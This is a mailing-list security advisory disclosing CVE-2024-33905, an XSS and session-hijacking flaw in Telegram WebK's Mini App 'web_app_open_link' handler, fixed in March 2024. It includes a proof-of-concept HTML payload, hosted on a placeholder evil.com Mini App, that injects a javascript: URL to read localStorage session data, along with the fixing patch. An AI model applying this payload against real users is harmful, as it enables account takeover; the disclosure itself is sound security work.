
List:       oss-security
Subject:    [oss-security] Re: Telegram Web app XSS / Session Hijacking 1-click
From:       Pedro Batista <pedbap.g () gmail ! com>
Date:       2024-04-30 9:30:09
Message-ID: CAD44bnO8ggssLh-DcW4Hm0FOAOWjNm0-0NWAzca7f_oKOrAyrA () mail ! gmail ! com


CVE-2024-33905

On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <pedbap.g@gmail.com> wrote:

> Hi oss-security,
> I would like to share a vulnerability I reported in the Telegram Web
> application, which is open source (https://github.com/morethanwords/tweb).
> The vulnerability is an XSS that can be exploited to achieve session
> hijacking with 1 click using Telegram Mini Apps.
> 
> I reported the vulnerability on March 9th, 2024 and Telegram promptly
> fixed it on March 11th, 2024.
> 
> # Vulnerable version: Telegram WebK 2.0.0 (486) and below
> # Fixed version: Telegram WebK 2.0.0 (488)
> 
> # Attack Surface
> ## Telegram Mini Apps
> "Telegram Mini Apps are essentially web applications that you can run
> directly within the Telegram messenger interface. Mini Apps support
> seamless authorization, integrated crypto and fiat payments (via Google Pay
> and Apple Pay), tailored push notifications, and more."
> 
> > https://core.telegram.org/bots/webapps
> > https://ton.org/mini-apps
> 
> It is important to highlight that this feature is heavily used for crypto
> payments on the TON Blockchain.
> 
> # Static Analysis
> A cached version of the vulnerable file can be found here:
> - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
> 
> ```
> telegramWebView.addMultipleEventsListeners({
> // [...]
> web_app_open_link:({url:t})=>{window.open(t,"_blank")}
> }
> ```
> The vulnerability was triggered via `postMessage` communication by
> abusing the event `web_app_open_link`, which allowed a new URL to remain
> in the JavaScript context of the parent window, using the `javascript:`
> scheme as the XSS payload.
> 
> # Weaponized Setup
> 1. Attacker creates a Bot + Mini App
> 2. Sets the URL of the Mini App => https://evil.com/homepage.html
> 3. The exploit will be hosted in the homepage of the attacker's site
> 3.1. homepage.html
> ```
> <body onload=exploit()>
> <script>
> function exploit() {
> window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link',
> eventData: {url:
> "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*'); }
> </script>
> </body>
> ```
> 
> # Telegram Patch Commit
> 
> https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts
>  
> ```
> export default function safeWindowOpen(url: string) {
>   window.open(url, '_blank', 'noreferrer');
> }
> ```
> 
> # Demo
> I have published a writeup for this finding which includes the Exploit
> Demo, it's available here:
> 
> https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90
> 
> I recently requested a CVE for this vulnerability as well, looking forward
> to updating the thread as soon as it is issued.
> 
> Thanks for looking into my report.
> 
> Best regards,
> Pedro Baptista
> 


